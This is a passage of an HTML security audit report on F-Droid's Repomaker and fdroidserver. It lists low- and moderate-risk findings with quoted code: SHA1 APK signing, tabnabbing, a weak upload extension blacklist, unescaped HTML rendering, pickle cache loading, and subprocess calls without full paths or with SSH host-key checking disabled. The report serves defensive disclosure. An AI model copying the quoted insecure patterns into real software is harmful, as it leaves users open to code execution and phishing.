0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">SHA1withRSA</span>, which is known to have collision issues, has been used to sign the application package. </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">

<div style="margin-bottom: 5pt; line-height: 6mm;">SHA1 was used by default in APK signing for a few years. A attacker might be able to create an APK with his/her malicious code,
and identical SHA1 digest of your genuine files. Devices that had previous version will consider the crafted APK to be signed by your certificate,
and issue no warning when installing it.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Note: If you use SHA256, the app will no longer work on Android devices &lt; 4.3. This means that builds made with the new cert system will create APK files that may not install on some Android 4.0-4.2 devices.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Signer Certificate</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">[
[
  Version: V3
  Subject: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
  Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5

  Key:
  Validity: [From: Fri Jul 23 22:40:24 IST 2010,
               To: Tue Dec 08 22:40:24 IST 2037]
  Issuer: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
  SerialNumber: [    4c49cd00]

]
  Algorithm: [SHA1withRSA]
  Signature:
0000: 08 E4 EF 69 9E 98 07 67   7F F5 67 53 DA 73 EF B2  ...i...g..gS.s..

0010: 39 0D 5A E2 C1 7E 4D B6   91 D5 DF 7A 7B 60 FC 07  9.Z...M....z.`..

0020: 1A E5 09 C5 41 4B E7 D5   DA 74 DF 28 11 E8 3D 36  ....AK...t.(..=6

0030: 68 C4 A0 B1 AB C8 4B 9F   A7 D9 6B 4C DF 30 BB A6  h.....K...kL.0..

0040: 85 17 AD 2A 93 E2 33 B0   42 97 2A C0 55 3A 48 01  ...*..3.B.*.U:H.

0050: C9 EB E0 7B F5 7E BE 9A   3B 3D 6D 66 39 65 26 0E  ........;=mf9e&amp;.

0060: 50 F3 B8 F4 6D B0 53 17   61 E6 03 40 A2 BD DC 34  P...m.S.a..@...4

0070: 26 09 83 97 FD A5 40 44   A1 7E 52 44 54 9F 98 69  &amp;.....@D..RDT..i

0080: B4 60 CA 5E 6E 21 6B 6F   6A 2D B0 58 0B 48 0C A2  .`.^n!koj-.X.H..

0090: AF E6 EC 6B 46 EE DA CF   A4 AA 45 03 88 09 EC E0  ...kF.....E.....

00A0: C5 97 86 53 D6 C8 5F 67   8E 7F 5A 21 56 D1 BE DD  ...S.._g..Z!V...

00B0: 81 17 75 1E 64 A4 B0 DC   D1 40 F3 04 0B 02 18 21  ..u.d....@.....!

00C0: A8 D9 3A ED 8D 01 BA 36   DB 6C 82 37 22 11 FE D7  ..:....6.l.7"...

00D0: 14 D9 A3 26 07 03 8C DF   D5 65 BD 52 9F FC 63 72  ...&amp;.....e.R..cr

00E0: 12 AA A2 C2 24 EF 22 B6   03 EC CE FB 5B F1 E0 85  ....$.".....[...

00F0: C1 91 D4 B2 4F E7 42 B1   7A B3 F5 5D 4E 6F 05 EF  ....O.B.z..]No..


]</div></pre>

</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Signing an app with a weaker algorithm makes it easy for attackers to create a malicious application package similar to original and sign it with a fake cert.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated. SHA256 is a better algorithm to use</div>
</div>
</div>




         <a name="f1-tabnabbing-in-repomaker"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.28</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-028 &#8212; Tabnabbing in Repomaker</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-028</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Tabnabbing</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Malicious target site opened from repomaker can manipulate the page that opened it.</div> </div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;"></div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">The opened page gets access to the opening pages <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">window.opener</span> object, allowing to inject javascript or changing it's location.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Locations</span></div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">The following one is probably low risk as the domain is under clients control</div>
  <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">repomaker/templates/repomaker/repo_page/index.html
  9:              &lt;a href="https://f-droid.org" target="_blank"&gt;Get F-Droid&lt;/a&gt;
  24:             &lt;a href="https://f-droid.org" target="_blank" class="rm-no-underline"&gt;
  42:        target="_blank"&gt;
  47:        target="_blank"&gt;</div></pre>
  <div style="margin-bottom: 5pt; line-height: 6mm;">The following seems medium risk, as the domain is possibly under attacker control.</div>
  <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">repomaker/templates/repomaker/repo/index_share.html
  36:                     &lt;a href="{{ repo.url }}" class="rm-repo-share-general-view" target="_blank"&gt;
  58:                     &lt;a href="{{ repo.url }}/assets/qr_code.html" class="rm-repo-share-add-scan" target="_blank"&gt;
  70:                        target="_blank"&gt;
  74:                        target="_blank"&gt;</div></pre>
  <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">more info</span></div>
  <div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div><a href="https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/" style="color: #e2632a;">https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/</a></div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div><a href="http:https://lcamtuf.coredump.cx/switch/" style="color: #e2632a;">http:https://lcamtuf.coredump.cx/switch/</a></div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div><a href="https://mathiasbynens.github.io/rel-noopener/" style="color: #e2632a;">https://mathiasbynens.github.io/rel-noopener/</a></div></td></tr></table></div>
</div>

<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">Low: Phishing</div>
</div>

<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 1.3cm; line-height: 6mm;">Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">rel="noopener"</span> when using <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">target="_blank"</span></div>
</div>

</div>
         <a name="f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.29</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-029 &#8212; Repomaker:apk:_def_get_type Allows for Mime Type Mismatches</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-029</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Malicious File Upload</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Insufficient checking of file types can lead to upload of malicious code.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">In ../code/repomaker/repomaker/models/apk.py:183 the code checks for mime-types using <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file(1)</span> mechanisms, but fails to enforce extension matching with the file type. Simple polyglot files can be stored in the repo matching video/audio/image mime class, yet containing scripts used in later stages of attacks.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">Furthermore if .py is not allowed in the same function in line 198, then .pyc and .pyo should also be forbidden:</div>
  <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">    # TODO add more types
  if ext.startswith('.php') or ext == '.py' or ext == '.pl' or ext == '.cgi':
  raise ValidationError(_('Unsupported File Type'))</div></pre>
  <div style="margin-bottom: 5pt; line-height: 6mm;">also .js should not be allowed.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;"><a href="https://capec.mitre.org/data/definitions/209.html" style="color: #e2632a;">https://capec.mitre.org/data/definitions/209.html</a></div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">Low: Staging of malicious code, needs another vulnerability to trigger</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">Check if the mime type matches the extension.</div>
  <div style="margin-bottom: 1.3cm; line-height: 6mm;">Use a white-list instead of a blacklist of extensions.</div>
</div>
</div>
         <a name="f10-unsafe-html-rendering-of-arbitrary-input"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.30</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-030 &#8212; Unsafe HTML Rendering of Arbitrary Input</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-030</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Unsafe use of the DatalistTextInput can lead to javascript injection in Repomaker. However this widget is currently only used to select predefined list of languages. However if in the future this widget is used to render unsanitized user input it can be easily exploited.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">In ../code/repomaker/repomaker/views/<span style="font-weight: bold;">init</span>.py the DataListTextInput render() function could be used to inject javascript:</div>
  <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">class DataListTextInput(TextInput):
  def __init__(self, data_list, *args, **kwargs):
     ...
     self._list = data_list

  def render(self, name, value, attrs=None, renderer=None):
     self.attrs.update({'list': 'list__%s' % name})
     text_html = super().render(name, value, attrs, renderer)
     data_list = '&lt;datalist id="list__%s"&gt;' % name
     for item in self._list:
        data_list += '&lt;option value="%s"&gt;%s&lt;/option&gt;' % (item[0], item[1])
     data_list += '&lt;/datalist&gt;'
     return text_html + data_list</div></pre>
  <div style="margin-bottom: 5pt; line-height: 6mm;">But this class is only instantiated in one place, views/app.py as shown:</div>
  <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">self.fields['lang'] = CharField(required=True, min_length=2, widget=DataListTextInput(settings.LANGUAGES))</div></pre>
  <div style="margin-bottom: 5pt; line-height: 6mm;">This limits the impact to negligible, but if this input widget gets used in other parts of the code care should be taken.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">Recommendations: </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">Low: cannot be currently exploited, but future use of this function could be exploitable.</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 1.3cm; line-height: 6mm;">clean the name and data_list contents before rendering.</div>
</div>
</div>
         <a name="f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.31</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-031 &#8212; Dangerous Deserialization Using Python Pickle in Fdroidserver:update.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-031</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Dangerous Function</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
 <div style="margin-bottom: 5pt; line-height: 6mm;">The dangerous python module pickle is being used to store and load a cache. On its own this is not exploitable, but when an attacker has can write files, then this can be escalated into a code execution vulnerability.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
 <div style="margin-bottom: 5pt; line-height: 6mm;">update.py uses the dangerous pickle module in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">get_cache()</span>. Although it is only written by write_cache(), if an attacker has a write file primitive it is possible to achieve code execution on the target.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from update.py:463</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">with open(apkcachefile, 'rb') as cf:
    apkcache = pickle.load(cf, encoding='utf-8')
if apkcache.get("METADATA_VERSION") != METADATA_VERSION \
   or apkcache.get('allow_disabled_algorithms') != ada:</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Recommendation: avoid pickle and save the dictionary using JSON.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">Low: needs a write files vulnerability to escalate into a code execution vulnerability</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Avoid the usage of the python pickle module</div></div>
</div>
         <a name="f19-starting-a-process-with-a-partial-executable-path"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.32</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-032 &#8212; Starting a Process With a Partial Executable Path</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-032</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Execution without path</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">All external programs that are called by fdroidserver depend on the correct executable to be first found in the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">$PATH</span> environment variable. If an attacker is able to place their own executable on a path before the legit executable that can lead to adversarial code execution.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">fdroidserver calls external executables without a path. This is an<div></div>
issue in case an attacker can write an executable on a <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">$PATH</span> before the<div></div>
genuine executable.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./docker/install_agent.py:10
call("adb wait-for-device", shell=True)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./docker/install_agent.py:22
output = check_output('adb shell "pm list packages"', shell=True)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./docker/install_agent.py:36
install_output = check_output("adb install /home/drozer/drozer-agent.apk", shell=True)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./docker/install_agent.py:47
pm_list_output = check_output('adb shell "pm list packages"', shell=True)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./docker/install_agent.py:56
call('adb shell "am start com.mwr.dz/.activities.MainActivity"', shell=True, stdout=FNULL)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./docker/install_agent.py:60
call("python /home/drozer/enable_service.py", shell=True, stdout=FNULL)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./docker/install_agent.py:63
call("adb forward tcp:31415 tcp:31415", shell=True, stdout=FNULL)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/build.py:80
buildserverid = subprocess.check_output(['vagrant', 'ssh', '-c',
                                         'cat /home/vagrant/buildserverid'],
                                        cwd='builder').rstrip().decode()</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/build.py:108
subprocess.check_output(['rsync', '--recursive', '--perms', '--links', '--quiet', '--rsh=' +
                         'ssh -o StrictHostKeyChecking=no' +
                         ' -o UserKnownHostsFile=/dev/null' +
                         ' -o LogLevel=FATAL' +
                         ' -o IdentitiesOnly=yes' +
                         ' -o PasswordAuthentication=no' +
                         ' -p ' + str(sshinfo['port']) +
                         ' -i ' + sshinfo['idfile'],
                         path,
                         sshinfo['user'] + "@" + sshinfo['hostname'] + ":" + ftp.getcwd()],
                        stderr=subprocess.STDOUT)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/build.py:137
fp.write(subprocess.check_output(['git', 'rev-parse', 'HEAD'],
                                   cwd=serverpath))</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/build.py:851
subprocess.call(['jar', 'uf', os.path.abspath(src),
                 'META-INF/' + fn], cwd=tmp_dir)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/common.py:2701
if subprocess.call(['jar', 'xf',
                    os.path.abspath(apk1)],
                   cwd=os.path.join(apk1dir, 'jar-xf')) != 0:</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/common.py:2705
if subprocess.call(['jar', 'xf',
                    os.path.abspath(apk2)],
                   cwd=os.path.join(apk2dir, 'jar-xf')) != 0:</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/mirror.py:36
subprocess.call(['wget', verbose, '--continue', '--user-agent="fdroid mirror"',
                 '--input-file=' + urls_file])</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/nightly.py:63
subprocess.check_call(['openssl', 'pkcs12', '-in', p12, '-out', key_pem,
                       '-passin', 'pass:' + PASSWORD, '-passout', 'pass:' + PASSWORD])
subprocess.check_call(['openssl', 'rsa', '-in', key_pem, '-out', privkey,</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/nightly.py:263
subprocess.check_call(['ssh', '-Tvi', ssh_private_key_file,
                       '-oIdentitiesOnly=yes', '-oStrictHostKeyChecking=no',
                       servergitmirror.split(':')[0]])</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/nightly.py:281
subprocess.check_call(['fdroid', 'update', '--rename-apks', '--create-metadata', '--verbose'],
                      cwd=repo_basedir)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./setup.py:23
version_git = subprocess.check_output(['git', 'describe', '--tags', '--always']).rstrip().decode('utf-8')</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./setup.py:57
subprocess.check_call(['pandoc', '--from=markdown', '--to=rst', 'README.md',
                       '--output=README.rst'], universal_newlines=True)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/stats.py:163
p = subprocess.Popen(["zcat", logfile], stdout=subprocess.PIPE)</div></pre>
